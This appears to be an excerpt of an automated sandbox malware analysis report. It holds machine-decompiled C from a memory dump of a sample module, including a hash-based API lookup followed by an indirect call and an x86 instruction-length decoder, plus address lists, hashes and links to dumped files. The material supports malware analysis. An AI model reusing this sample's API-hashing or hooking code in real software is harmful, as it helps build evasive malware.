										E6E7D38F0( *((intOrPtr*)(_t449 + 0xa4)),  *((intOrPtr*)(_t449 + 0x9c)), E6E7CF4CC(_t430) - _t443);
										_t449 = _t449 + 0xc;
									}
									E6E7CF828(_t430, E6E7CF4CC(_t430) + 0xfffffffc);
									_t308 =  *(_t449 + 4);
									 *_t308 =  *_t308 - 1;
									__eflags =  *_t308;
								}
								_t442 = E6E7D3064(0x60a28c5c, 0xe96b154c);
								__eflags = _t442;
								if(_t442 != 0) {
									 *_t442( *(E6E7CF4BC( *(_t449 + 4),  *(_t449 + 0x64))));
								}
								_t285 = E6E7CF4CC( *_t449);
								__eflags = _t285 -  *(_t449 + 0x64);
								if(_t285 >  *(_t449 + 0x64)) {
									_t445 = 4 + _t324 * 4;
									_t287 = E6E7CF4CC( *_t449);
									__eflags = _t287 - _t445;
									if(_t287 > _t445) {
										_t430 = E6E7CF4BC( *(_t449 + 4),  *(_t449 + 0x64));
										 *((intOrPtr*)(_t449 + 0xa0)) = E6E7CF4BC( *(_t449 + 4), _t445);
										E6E7D38F0(_t288,  *((intOrPtr*)(_t449 + 0xa4)), E6E7CF4CC( *_t449) - _t445);
										_t449 = _t449 + 0xc;
									}
									E6E7CF828( *(_t449 + 4), E6E7CF4CC( *_t449) + 0xfffffffc);
									_t296 =  *(_t449 + 4);
									_t33 =  &(_t296[6]);
									 *_t33 = _t296[6] - 1;
									__eflags =  *_t33;
								}
								_t324 = _t324 - 1;
								__eflags = _t324;
								goto L20;
							}
							_t444 = 0;
							__eflags = 0;
							while(1) {
								_t310 = E6E7CF4BC(_t449 + 0x28, _t444 * 4);
								__eflags =  *_t310 -  *_t429;
								if( *_t310 ==  *_t429) {
									break;
								}
								_t444 = _t444 + 1;
								__eflags = _t444 - _t430;
								if(_t444 < _t430) {
									continue;
								}
								goto L11;
							}
							__eflags = _t444 - 0xffffffff;
							if(_t444 == 0xffffffff) {
								goto L11;
							}
							L20:
							_t324 = _t324 + 1;
							__eflags = _t324 -  *( *(_t449 + 4));
						} while (_t324 <  *( *(_t449 + 4)));
						goto L21;
					}
				}
			}

0x6e7c8435
0x6e7c843b
0x6e7c843f
0x6e7c8443
0x6e7c844e
0x6e7c8452
0x6e7c8457
0x6e7c845f
0x6e7c846f
0x00000000
0x6e7c8471
0x6e7c8479
0x6e7c8480
0x6e7c8480
0x6e7c89d3
0x6e7c89d5
0x6e7c8a16
0x6e7c8a18
0x6e7c8a27
0x6e7c8a33
0x6e7c8a33
0x6e7c8a22
0x6e7c8a39
0x6e7c8a3e
0x00000000
0x6e7c8a3e
0x6e7c8a26
0x00000000
0x6e7c848a
0x6e7c848e
0x6e7c8491
0x6e7c8599
0x6e7c8599
0x6e7c859e
0x6e7c86c1
0x6e7c86c5
0x6e7c86ca
0x6e7c86ce
0x6e7c86d2
0x6e7c8808
0x6e7c880a
0x6e7c880e
0x6e7c8817
0x6e7c8822
0x6e7c8826
0x6e7c882f
0x6e7c8834
0x6e7c883a
0x6e7c883b
0x6e7c883f
0x6e7c8843
0x6e7c884a
0x6e7c884c
0x6e7c898c
0x6e7c899d
0x6e7c89a4
0x6e7c89ab
0x6e7c89ab
0x6e7c89ae
0x6e7c89b1
0x6e7c89b4
0x6e7c89ba
0x6e7c89c1
0x6e7c89c5
0x6e7c89ce
0x00000000
0x6e7c89ce
0x6e7c89bc
0x6e7c89bf
0x6e7c89d8
0x6e7c89f0
0x6e7c89f3
0x6e7c89f8
0x6e7c8a02
0x6e7c8a05
0x6e7c8a08
0x6e7c8a11
0x00000000
0x6e7c8a11
0x00000000
0x6e7c89bf
0x6e7c8854
0x6e7c8854
0x6e7c8856
0x6e7c885a
0x6e7c885f
0x6e7c8861
0x6e7c8865
0x6e7c8868
0x6e7c8870
0x6e7c8872
0x00000000
0x00000000
0x6e7c8889
0x6e7c88a4
0x6e7c88a6
0x6e7c88b4
0x6e7c88b9
0x6e7c88bb
0x6e7c88d8
0x6e7c88d8
0x6e7c88dc
0x6e7c88de
0x00000000
0x00000000
0x6e7c88e0
0x6e7c88e3
0x6e7c8904
0x6e7c8923
0x6e7c8929
0x6e7c892c
0x6e7c8931
0x6e7c8932
0x6e7c8939
0x00000000
0x00000000
0x6e7c8941
0x6e7c8941
0x6e7c8943
0x6e7c894f
0x6e7c895b
0x6e7c897d
0x6e7c8982
0x6e7c8983
0x6e7c8983
0x00000000
0x6e7c8943
0x00000000
0x6e7c88e3
0x6e7c88bd
0x6e7c88c3
0x6e7c88c5
0x6e7c88c6
0x6e7c88c7
0x6e7c88c8
0x6e7c88cc
0x6e7c88d0
0x6e7c88d2
0x6e7c88d3
0x6e7c88d4
0x6e7c88d6
0x00000000
0x00000000
0x00000000
0x6e7c88d6
0x6e7c88e9
0x00000000
0x6e7c88e9
0x6e7c86d8
0x6e7c86da
0x6e7c86dc
0x00000000
0x00000000
0x6e7c86e6
0x6e7c86e6
0x6e7c86e8
0x6e7c86eb
0x6e7c86ed
0x6e7c86f5
0x6e7c86fc
0x6e7c8700
0x6e7c8703
0x00000000
0x00000000
0x6e7c87ff
0x6e7c8800
0x6e7c8802
0x00000000
0x00000000
0x00000000
0x6e7c8802
0x6e7c8709
0x6e7c870c
0x6e7c8715
0x6e7c871a
0x6e7c871c
0x6e7c8728
0x6e7c872c
0x6e7c8731
0x6e7c8735
0x6e7c8b12
0x6e7c8b26
0x6e7c8b48
0x6e7c8b4d
0x6e7c8b4d
0x6e7c874b
0x6e7c8750
0x6e7c8754
0x6e7c8754
0x6e7c8754
0x6e7c8754
0x6e7c8759
0x6e7c875e
0x6e7c8760
0x6e7c8764
0x6e7c876b
0x6e7c8770
0x6e7c8772
0x6e7c8ad3
0x6e7c8ae2
0x6e7c8afb
0x6e7c8b00
0x6e7c8b00
0x6e7c8785
0x6e7c878a
0x6e7c878e
0x6e7c878e
0x6e7c878e
0x6e7c87a0
0x6e7c87c1
0x6e7c87c9
0x6e7c87d7
0x6e7c87f5
0x6e7c87fb
0x6e7c87fb
0x00000000
0x6e7c870c
0x6e7c85a4
0x6e7c85a4
0x6e7c85a6
0x6e7c85ad
0x6e7c85bb
0x6e7c85bd
0x6e7c85c1
0x6e7c85c3
0x6e7c85c5
0x6e7c8600
0x6e7c860f
0x6e7c8611
0x6e7c8613
0x6e7c8631
0x6e7c8633
0x6e7c8635
0x6e7c8647
0x6e7c8665
0x6e7c866e
0x6e7c8671
0x6e7c867f
0x6e7c8690
0x6e7c86ae
0x6e7c86b0
0x6e7c86b4
0x6e7c86b4
0x6e7c86b4
0x6e7c8635
0x00000000
0x6e7c8613
0x6e7c85cb
0x6e7c85cb
0x6e7c85d0
0x6e7c85d7
0x6e7c85e6
0x6e7c85ed
0x6e7c85ef
0x00000000
0x00000000
0x6e7c85fb
0x6e7c85fc
0x6e7c85fe
0x00000000
0x00000000
0x00000000
0x6e7c85fe
0x6e7c85f1
0x6e7c85f4
0x00000000
0x00000000
0x6e7c86b6
0x6e7c86b6
0x6e7c86b7
0x6e7c86b7
0x00000000
0x6e7c8497
0x6e7c8497
0x6e7c8497
0x6e7c8499
0x6e7c84a0
0x6e7c84ae
0x6e7c84b0
0x6e7c84b4
0x6e7c84b6
0x6e7c84e2
0x6e7c84e6
0x6e7c84eb
0x6e7c84f0
0x6e7c84f4
0x6e7c84f8
0x6e7c84ff
0x6e7c8504
0x6e7c8506
0x6e7c8a95
0x6e7c8aa4
0x6e7c8ac3
0x6e7c8ac8
0x6e7c8ac8
0x6e7c8519
0x6e7c851e
0x6e7c8522
0x6e7c8522
0x6e7c8522
0x6e7c8533
0x6e7c8535
0x6e7c8537
0x6e7c8548
0x6e7c8548
0x6e7c854d
0x6e7c8552
0x6e7c8556
0x6e7c855b
0x6e7c8562
0x6e7c8567
0x6e7c8569
0x6e7c8a57
0x6e7c8a63
0x6e7c8a7d
0x6e7c8a82
0x6e7c8a82
0x6e7c857f
0x6e7c8584
0x6e7c8588
0x6e7c8588
0x6e7c8588
0x6e7c8588
0x6e7c858b
0x6e7c858b
0x00000000
0x6e7c858b
0x6e7c84ba
0x6e7c84ba
0x6e7c84bc
0x6e7c84c8
0x6e7c84cf
0x6e7c84d1
0x00000000
0x00000000
0x6e7c84dd
0x6e7c84de
0x6e7c84e0
0x00000000
0x00000000
0x00000000
0x6e7c84e0
0x6e7c84d3
0x6e7c84d6
0x00000000
0x00000000
0x6e7c858c
0x6e7c8590
0x6e7c8591
0x6e7c8591
0x00000000
0x6e7c8499
0x6e7c8491

Strings

, xrefs: 6E7C8A1A

Memory Dump Source

Source File: 00000000.00000002.1189977007.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1189969469.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189990556.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1189997046.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1190003602.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 9a13bbcdb8a7fdc555e9a0211e3fd7581dabdceb63bb39cc66d0c75505442aad
Instruction ID: 19c62d2310efc5294522f2532040306fc93de25d57d18eb66ecaed2715d33b2b
Opcode Fuzzy Hash: 9a13bbcdb8a7fdc555e9a0211e3fd7581dabdceb63bb39cc66d0c75505442aad
Instruction Fuzzy Hash: 131270712086059FD718DFA4CA84AAEB7EDEF84B04F104D2DE599972B1EB30AD05CB53

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D9370, Relevance: 1.8, Strings: 1, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E6E7D9370(intOrPtr __ecx, intOrPtr __edx, void* __eflags) {
				signed int _t250;
				signed char _t251;
				signed char* _t254;
				char _t255;
				signed short _t256;
				char _t257;
				signed short _t260;
				signed int _t261;
				signed int _t262;
				void* _t264;
				void* _t272;
				void* _t273;
				signed short* _t274;
				signed char _t275;
				signed int _t277;
				signed int _t278;
				void* _t282;
				signed int _t288;
				unsigned int _t290;
				signed int _t292;
				signed int _t293;
				signed int _t294;
				signed int _t295;
				unsigned int _t296;
				unsigned int _t297;
				signed int _t299;
				unsigned int _t301;
				signed char _t302;
				signed int _t304;
				signed char _t307;
				signed char _t308;
				signed int _t309;
				void* _t312;
				void* _t313;
				signed int _t314;
				signed int _t316;
				signed int _t319;
				signed int _t321;
				signed int _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				unsigned int* _t346;
				unsigned int _t354;
				signed int _t355;
				void* _t357;
				signed int _t364;
				signed int _t366;
				signed int _t383;
				signed int _t388;
				signed int _t391;
				signed int _t395;
				signed int _t396;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t403;
				signed int _t408;
				signed int _t411;
				signed int _t412;
				signed int _t413;
				signed int _t417;
				signed int _t419;
				signed int _t424;
				void* _t426;
				signed int* _t427;

				 *((intOrPtr*)(_t426 + 0x24)) = __edx;
				 *((intOrPtr*)(_t426 + 0x10)) = __ecx;
				 *((intOrPtr*)(_t426 + 0x14)) = __ecx;
				_t274 =  *(_t426 + 0x48);
				E6E7D3698( *(_t426 + 0x48), 0, 0x1c);
				_t427 = _t426 + 0xc;
				_t338 = 0;
				_t282 = 0x10;
				do {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					if(_t250 == 0xf3) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000004;
						L17:
						_t338 = _t339 & 0x000000ff;
						 *(_t383 + 1) = _t250;
						goto L18;
					}
					if(_t250 == 0xf2) {
						_t383 = _t427[0x10];
						_t339 = _t338 | 0x00000002;
						goto L17;
					}
					if(_t250 == 0xf0) {
						_t338 = (_t338 | 0x00000020) & 0x000000ff;
						 *(_t427[0x10] + 2) = _t250;
						goto L18;
					}
					if(_t250 == 0x26 || _t250 == 0x2e || _t250 == 0x36 || _t250 == 0x3e) {
						L13:
						_t338 = (_t338 | 0x00000040) & 0x000000ff;
						 *(_t427[0x10] + 3) = _t250;
					} else {
						_t6 = _t250 - 0x64; // -100
						if(_t6 <= 1) {
							goto L13;
						}
						if(_t250 == 0x66) {
							_t338 = (_t338 | 0x00000008) & 0x000000ff;
							 *(_t427[0x10] + 4) = _t250;
							goto L18;
						}
						if(_t250 != 0x67) {
							break;
						} else {
							_t338 = _t338 | 0x00000010;
							 *(_t427[0x10] + 5) = _t250;
							goto L18;
						}
					}
					L18:
					_t282 = _t282 + 0xff;
				} while (_t282 != 0);
				_t388 = _t427[0x10];
				_t285 =  !=  ? _t338 : 1;
				_t343 = _t338 << 0x17;
				 *(_t388 + 6) = _t250;
				 *_t427 =  !=  ? _t338 : 1;
				 *(_t388 + 0x18) = _t343;
				if(_t250 == 0xf) {
					_t250 =  *_t274 & 0x000000ff;
					_t274 =  &(_t274[0]);
					_t427[5] = _t250;
					 *(_t427[0x10] + 7) = _t250;
					_t427[2] = _t427[4] + 0x4a;
				} else {
					_t22 = _t250 - 0xa0; // -160
					_t427[5] =  *(_t427[0x10] + 7) & 0x000000ff;
					if(_t22 <= 3) {
						_t424 =  *_t427;
						_t382 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
						 *_t427 =  !=  ? (_t424 | 0x00000008) & 0x000000ff : _t424 & 0x000000f7;
					}
				}
				_t354 = _t250 >> 2;
				_t391 = _t250 & 0x00000003;
				_t345 = _t427[2];
				_t427[3] = _t391;
				_t427[6] = _t354;
				_t288 =  *(( *(_t354 + _t345) & 0x000000ff) + _t391 + _t345) & 0x000000ff;
				_t427[1] = _t288;
				if(_t288 == 0xff) {
					_t343 = _t343 + 0x3000;
					_t288 = 0 | (_t250 & 0xfffffffd) == 0x00000024;
					 *(_t427[0x10] + 0x18) = _t343;
					_t427[1] = _t288;
				}
				if((_t427[1] & 0x00000080) != 0) {
					_t290 =  *((_t288 & 0x0000007f) + _t345) & 0x0000ffff;
					_t427[1] = _t290;
					_t395 = _t290 >> 8;
				} else {
					_t395 = 0;
				}
				if(_t427[5] != 0 && ( *_t427 &  *(( *(_t427[6] + _t427[4] + 0x130) & 0x000000ff) + _t427[3] + _t427[4] + 0x130) & 0x000000ff) != 0) {
					_t343 = _t343 | 0x00003000;
					 *(_t427[0x10] + 0x18) = _t343;
				}
				if((_t427[1] & 0x00000001) == 0) {
					if(( *_t427 & 0x00000020) != 0) {
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					goto L114;
				} else {
					_t355 = _t427[0x10];
					_t343 = _t343 | 0x00000001;
					 *(_t355 + 0x18) = _t343;
					_t296 =  *_t274 & 0x000000ff;
					_t346 =  &(_t427[6]);
					 *_t346 = _t296;
					 *(_t355 + 8) = _t296;
					_t297 = _t296 >> 6;
					_t427[3] = _t297;
					 *(_t355 + 9) = _t297;
					_t299 =  *_t346 & 0x00000007;
					_t427[7] = _t299;
					 *(_t355 + 0xb) = _t299;
					_t301 =  *_t346 & 0x0000003f;
					 *_t346 = _t301;
					_t302 = _t301 >> 3;
					_t427[2] = _t302;
					 *(_t355 + 0xa) = _t302;
					if(_t395 != 0 && (_t395 << _t302 & 0x00000080) != 0) {
						_t343 = _t343 | 0x00003000;
						 *(_t427[0x10] + 0x18) = _t343;
					}
					if(_t427[5] == 0) {
						_t80 = _t250 - 0xd9; // -217
						if(_t80 <= 6) {
							_t81 = _t250 + 0x27; // 0x27
							_t417 = _t81 & 0x000000ff;
							if(_t427[3] != 3) {
								_t419 = ( *(_t417 + _t427[4] + 0xf1) & 0x000000ff) << _t427[2];
							} else {
								_t419 = ( *(_t427[4] + _t427[2] + 0xf8 + _t417 * 8) & 0x000000ff) << _t427[7];
							}
							if((_t419 & 0x00000080) != 0) {
								_t343 = _t343 | 0x00003000;
								 *(_t427[0x10] + 0x18) = _t343;
							}
						}
					}
					if(( *_t427 & 0x00000020) == 0) {
						L52:
						if(_t427[5] == 0) {
							if(_t250 == 0x8c) {
								L85:
								if(_t427[2] <= 5) {
									L87:
									_t427[5] = _t274[0];
									_t427[4] =  &(_t274[1]);
									if(_t427[2] <= 1) {
										if(_t250 != 0xf6) {
											_t309 = _t427[1];
											_t310 =  ==  ? _t309 | 0xffffff90 : _t309;
											_t427[1] =  ==  ? _t309 | 0xffffff90 : _t309;
										} else {
											_t427[1] = _t427[1] | 0xffffff82;
										}
									}
									if(_t427[3] == 0) {
										if(( *_t427 & 0x00000010) == 0) {
											_t264 = 4;
											_t357 =  ==  ? _t264 : 0;
										} else {
											_t273 = 2;
											_t357 =  ==  ? _t273 : 0;
										}
									} else {
										if(_t427[3] == 1) {
											_t357 = 1;
										} else {
											if(_t427[3] == 2) {
												_t357 = (( !( *_t427) & 0x00000010) >> 3) + 2;
											} else {
												_t357 = 0;
											}
										}
									}
									if(_t427[3] != 3 && _t427[7] == 4 && ( *_t427 & 0x00000010) == 0) {
										_t307 = _t427[5];
										_t343 = _t343 | 0x00000002;
										_t403 = _t427[0x10];
										_t427[4] =  &(_t274[1]);
										 *(_t403 + 0xc) = _t307;
										_t308 = _t307 & 0x00000007;
										 *(_t403 + 0x18) = _t343;
										 *(_t403 + 0xd) = _t307 >> 6;
										 *(_t403 + 0xe) = (_t307 & 0x0000003f) >> 3;
										 *(_t403 + 0xf) = _t308;
										if(_t308 == 5) {
											_t272 = 4;
											_t357 =  ==  ? _t272 : _t357;
										}
									}
									if(_t357 == 1) {
										_t304 = _t427[0x10];
										_t343 = _t343 | 0x00000020;
										 *(_t304 + 0x18) = _t343;
										 *((char*)(_t304 + 0x14)) =  *(_t427[4] - 1);
									} else {
										if(_t357 == 2) {
											_t277 = _t427[0x10];
											_t343 = _t343 | 0x00000040;
											 *(_t277 + 0x18) = _t343;
											 *((short*)(_t277 + 0x14)) =  *(_t427[4] - 1) & 0x0000ffff;
										} else {
											if(_t357 == 4) {
												_t278 = _t427[0x10];
												_t343 = _t343 | 0x00000080;
												 *(_t278 + 0x18) = _t343;
												 *(_t278 + 0x14) =  *(_t427[4] - 1);
											}
										}
									}
									_t195 = _t427[4] - 1; // -1
									_t274 = _t357 + _t195;
									L114:
									_t251 = _t427[1];
									_t292 = _t251 & 0x00000040;
									if((_t251 & 0x00000010) == 0) {
										L121:
										if((_t427[1] & 0x00000004) == 0) {
											L129:
											if((_t427[1] & 0x00000002) != 0) {
												_t396 = _t427[0x10];
												_t343 = _t343 | 0x00000004;
												 *(_t396 + 0x18) = _t343;
												_t257 =  *_t274;
												_t274 =  &(_t274[0]);
												 *((char*)(_t396 + 0x10)) = _t257;
											}
											if(_t292 == 0) {
												if((_t427[1] & 0x00000020) != 0) {
													_t293 = _t427[0x10];
													_t343 = _t343 | 0x00000104;
													 *(_t293 + 0x18) = _t343;
													_t255 =  *_t274;
													_t274 =  &(_t274[0]);
													 *((char*)(_t293 + 0x10)) = _t255;
												}
												goto L135;
											} else {
												L132:
												_t294 = _t427[0x10];
												_t343 = _t343 | 0x00000110;
												 *(_t294 + 0x18) = _t343;
												_t256 =  *_t274;
												_t274 =  &(_t274[2]);
												 *(_t294 + 0x10) = _t256;
												L135:
												_t275 = _t274 - _t427[0xf];
												if(_t275 <= 0xf) {
													 *(_t427[0x10]) = _t275;
												} else {
													_t254 = _t427[0x10];
													_t275 = 0xf;
													_t254[0x18] = _t343 | 0x00005000;
													 *_t254 = _t275;
												}
												return _t275 & 0x000000ff;
											}
										}
										if((_t343 & 0x00000010) == 0) {
											if((_t343 & 0x00000008) == 0) {
												_t397 = _t427[0x10];
												_t343 = _t343 | 0x00000008;
												 *(_t397 + 0x18) = _t343;
												 *((short*)(_t397 + 0x10)) =  *_t274 & 0x0000ffff;
												L128:
												_t274 =  &(_t274[1]);
												goto L129;
											}
											_t398 = _t427[0x10];
											_t343 = _t343 | 0x00000800;
											L126:
											 *(_t398 + 0x18) = _t343;
											 *((short*)(_t398 + 0x14)) =  *_t274 & 0x0000ffff;
											goto L128;
										}
										_t398 = _t427[0x10];
										_t343 = _t343 | 0x00000008;
										goto L126;
									}
									if(_t292 == 0) {
										if(( *_t427 & 0x00000008) == 0) {
											_t399 = _t427[0x10];
											_t343 = _t343 | 0x00000010;
											 *(_t399 + 0x18) = _t343;
											_t260 =  *_t274;
											_t274 =  &(_t274[2]);
											 *(_t399 + 0x10) = _t260;
										} else {
											_t400 = _t427[0x10];
											_t343 = _t343 | 0x00000008;
											 *(_t400 + 0x18) = _t343;
											_t261 =  *_t274 & 0x0000ffff;
											_t274 =  &(_t274[1]);
											 *(_t400 + 0x10) = _t261;
										}
										goto L121;
									}
									if(( *_t427 & 0x00000008) == 0) {
										goto L132;
									}
									_t295 = _t427[0x10];
									_t343 = _t343 | 0x00000108;
									 *(_t295 + 0x18) = _t343;
									_t262 =  *_t274 & 0x0000ffff;
									_t274 =  &(_t274[1]);
									 *(_t295 + 0x10) = _t262;
									goto L135;
								}
								L86:
								_t343 = _t343 | 0x00011000;
								 *(_t427[0x10] + 0x18) = _t343;
								goto L87;
							}
							if(_t250 != 0x8e) {
								L66:
								if(_t427[3] != 3) {
									if(_t427[5] == 0) {
										goto L87;
									}
									if(_t250 == 0xd7 || _t250 == 0xf7) {
										L83:
										if(( *_t427 & 0x00000009) != 0) {
											goto L86;
										}
									} else {
										if(_t250 == 0xd6) {
											if(( *_t427 & 0x00000006) != 0) {
												goto L86;
											}
											goto L87;
										}
										if(_t250 == 0xc5) {
											goto L86;
										}
										if(_t250 == 0x50) {
											goto L83;
										}
									}
									goto L87;
								}
								_t364 = _t427[4];
								_t312 = _t364 + 0x1da;
								_t366 =  !=  ? _t312 : _t364 + 0x1cb;
								_t313 =  !=  ? _t427[9] + _t364 : _t312;
								_t427[4] = _t366;
								if(_t366 == _t313) {
									goto L87;
								} else {
									goto L68;
								}
								while(1) {
									L68:
									_t408 = _t427[4];
									if(_t250 ==  *_t408) {
										break;
									}
									_t411 = _t408 + 3;
									_t427[4] = _t411;
									if(_t411 != _t313) {
										continue;
									}
									goto L87;
								}
								_t314 = _t408;
								if(( *_t427 &  *(_t314 + 1) & 0x000000ff) == 0) {
									goto L87;
								}
								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6e7d9377
0x6e7d937b
0x6e7d9387
0x6e7d938b
0x6e7d938f
0x6e7d9394
0x6e7d9397
0x6e7d9399
0x6e7d939b
0x6e7d939b
0x6e7d939e
0x6e7d93a4
0x6e7d941c
0x6e7d9420
0x6e7d9423
0x6e7d9423
0x6e7d9426
0x00000000
0x6e7d9426
0x6e7d93ab
0x6e7d9413
0x6e7d9417
0x00000000
0x6e7d9417
0x6e7d93b2
0x6e7d940b
0x6e7d940e
0x00000000
0x6e7d940e
0x6e7d93b7
0x6e7d93f5
0x6e7d93fc
0x6e7d93ff
0x6e7d93c8
0x6e7d93c8
0x6e7d93ce
0x00000000
0x00000000
0x6e7d93d3
0x6e7d93ed
0x6e7d93f0
0x00000000
0x6e7d93f0
0x6e7d93d8
0x00000000
0x6e7d93da
0x6e7d93de
0x6e7d93e1
0x00000000
0x6e7d93e1
0x6e7d93d8
0x6e7d9429
0x6e7d9429
0x6e7d9429
0x6e7d9432
0x6e7d943b
0x6e7d943e
0x6e7d9441
0x6e7d9444
0x6e7d9447
0x6e7d944d
0x6e7d948f
0x6e7d9492
0x6e7d9493
0x6e7d949a
0x6e7d949d
0x6e7d944f
0x6e7d9453
0x6e7d945d
0x6e7d9464
0x6e7d9466
0x6e7d947f
0x6e7d9482
0x6e7d9482
0x6e7d9464
0x6e7d94a5
0x6e7d94a8
0x6e7d94ab
0x6e7d94af
0x6e7d94b3
0x6e7d94bd
0x6e7d94c1
0x6e7d94cb
0x6e7d94d4
0x6e7d94e1
0x6e7d94e4
0x6e7d94e7
0x6e7d94e7
0x6e7d94f3
0x6e7d94fe
0x6e7d9504
0x6e7d9508
0x6e7d94f5
0x6e7d94f5
0x6e7d94f5
0x6e7d9510
0x6e7d953a
0x6e7d9540
0x6e7d9540
0x6e7d9548
0x6e7d98f1
0x6e7d98f7
0x6e7d98fd
0x6e7d98fd
0x00000000
0x6e7d954e
0x6e7d954e
0x6e7d9552
0x6e7d9555
0x6e7d9558
0x6e7d955b
0x6e7d955f
0x6e7d9561
0x6e7d9564
0x6e7d9567
0x6e7d956b
0x6e7d9570
0x6e7d9573
0x6e7d9577
0x6e7d957c
0x6e7d957f
0x6e7d9581
0x6e7d9584
0x6e7d9588
0x6e7d958d
0x6e7d959d
0x6e7d95a3
0x6e7d95a3
0x6e7d95ab
0x6e7d95ad
0x6e7d95b6
0x6e7d95b8
0x6e7d95bb
0x6e7d95c6
0x6e7d95f3
0x6e7d95c8
0x6e7d95df
0x6e7d95df
0x6e7d95fb
0x6e7d9601
0x6e7d9607
0x6e7d9607
0x6e7d95fb
0x6e7d95b6
0x6e7d960e
0x6e7d967f
0x6e7d9684
0x6e7d96dd
0x6e7d979f
0x6e7d97a4
0x6e7d97b3
0x6e7d97b9
0x6e7d97bd
0x6e7d97c6
0x6e7d97cd
0x6e7d97d6
0x6e7d97e4
0x6e7d97e7
0x6e7d97cf
0x6e7d97cf
0x6e7d97cf
0x6e7d97cd
0x6e7d97f0
0x6e7d981d
0x6e7d9830
0x6e7d9838
0x6e7d981f
0x6e7d9821
0x6e7d9829
0x6e7d9829
0x6e7d97f2
0x6e7d97f7
0x6e7d9816
0x6e7d97f9
0x6e7d97fe
0x6e7d980f
0x6e7d9800
0x6e7d9800
0x6e7d9800
0x6e7d97fe
0x6e7d97f7
0x6e7d9840
0x6e7d984f
0x6e7d985c
0x6e7d9865
0x6e7d9869
0x6e7d986d
0x6e7d9870
0x6e7d9873
0x6e7d9876
0x6e7d9879
0x6e7d987c
0x6e7d9882
0x6e7d9886
0x6e7d988c
0x6e7d988c
0x6e7d9882
0x6e7d9892
0x6e7d98cf
0x6e7d98d3
0x6e7d98da
0x6e7d98e0
0x6e7d9894
0x6e7d9897
0x6e7d98b7
0x6e7d98bb
0x6e7d98c2
0x6e7d98c9
0x6e7d9899
0x6e7d989c
0x6e7d989e
0x6e7d98a2
0x6e7d98ac
0x6e7d98b2
0x6e7d98b2
0x6e7d989c
0x6e7d9897
0x6e7d98e7
0x6e7d98e7
0x6e7d9900
0x6e7d9900
0x6e7d9906
0x6e7d990b
0x6e7d9965
0x6e7d996a
0x6e7d99a9
0x6e7d99ae
0x6e7d99b0
0x6e7d99b4
0x6e7d99b7
0x6e7d99ba
0x6e7d99bc
0x6e7d99bd
0x6e7d99bd
0x6e7d99c2
0x6e7d99e0
0x6e7d99e2
0x6e7d99e6
0x6e7d99ec
0x6e7d99ef
0x6e7d99f1
0x6e7d99f2
0x6e7d99f2
0x00000000
0x6e7d99c4
0x6e7d99c4
0x6e7d99c4
0x6e7d99c8
0x6e7d99ce
0x6e7d99d1
0x6e7d99d3
0x6e7d99d6
0x6e7d99f5
0x6e7d99f5
0x6e7d99fc
0x6e7d9a16
0x6e7d99fe
0x6e7d99fe
0x6e7d9a0a
0x6e7d9a0b
0x6e7d9a0e
0x6e7d9a0e
0x6e7d9a24
0x6e7d9a24
0x6e7d99c2
0x6e7d996f
0x6e7d997d
0x6e7d9995
0x6e7d9999
0x6e7d999c
0x6e7d99a2
0x6e7d99a6
0x6e7d99a6
0x00000000
0x6e7d99a6
0x6e7d997f
0x6e7d9983
0x6e7d9989
0x6e7d9989
0x6e7d998f
0x00000000
0x6e7d998f
0x6e7d9971
0x6e7d9975
0x00000000
0x6e7d9975
0x6e7d990f
0x6e7d993b
0x6e7d9953
0x6e7d9957
0x6e7d995a
0x6e7d995d
0x6e7d995f
0x6e7d9962
0x6e7d993d
0x6e7d993d
0x6e7d9941
0x6e7d9944
0x6e7d9947
0x6e7d994a
0x6e7d994d
0x6e7d994d
0x00000000
0x6e7d993b
0x6e7d9915
0x00000000
0x00000000
0x6e7d991b
0x6e7d991f
0x6e7d9925
0x6e7d9928
0x6e7d992b
0x6e7d992e
0x00000000
0x6e7d992e
0x6e7d97a6
0x6e7d97aa
0x6e7d97b0
0x00000000
0x6e7d97b0
0x6e7d96e8
0x6e7d96fa
0x6e7d96ff
0x6e7d976a
0x00000000
0x00000000
0x6e7d9771
0x6e7d9797
0x6e7d979b
0x00000000
0x00000000
0x6e7d977a
0x6e7d977f
0x6e7d9793
0x00000000
0x00000000
0x00000000
0x6e7d9795
0x6e7d9786
0x00000000
0x00000000
0x6e7d978b
0x00000000
0x00000000
0x6e7d978d
0x00000000
